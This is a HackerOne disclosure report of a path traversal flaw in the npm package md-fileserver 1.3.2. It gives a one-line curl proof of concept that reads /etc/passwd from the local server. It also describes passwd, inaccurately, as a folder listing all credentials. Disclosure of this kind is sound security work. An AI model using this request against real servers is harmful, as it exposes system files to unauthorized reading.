[md-fileserver] Path Traversal

Disclosed: 2020-01-29 16:25:58 By johnssimon007 To nodejs-ecosystem
High
Vulnerability Details
I would like to report path traversal in md-fileserver modulee It allows an attacker to read system files via path traversal through commandline # Module **module name:** md-fileserver **version:** 1.3.2 **npm page:** `https://www.npmjs.com/package/md-fileserver` ## Module Description Starts a local server to render "markdown" files within your browser: # Vulnerability ## Vulnerability Description Directory traversal through the url which doesn't verify the file is from the root directory path. ## Steps To Reproduce: 1.npm install -g md-fileserver 2.start the local server by typing below on commandline $mdstart 3.now on terminal type curl -v --path-as-is http://127.0.0.1:8080/etc/passwd it will list all the credentials in passwd folder ## Supporting Material/References: > State all technical information about the stack where the vulnerability was found - [OPERATING SYSTEM VERSION] kali linux - [NODEJS VERSION] 11.8.0 - [NPM VERSION] 6.5.0 # Wrap up > Select Y or N for the following statements: - I contacted the maintainer to let them know: [N] - I opened an issue in the related repository: [N] ## Impact This vulnerability allows malicious user to read content of any file on the server, which leads to data breach or other attacks.
Actions
View on HackerOne
Report Stats
  • Report ID: 509697
  • State: Closed
  • Substate: resolved
  • Upvotes: 1
Share this report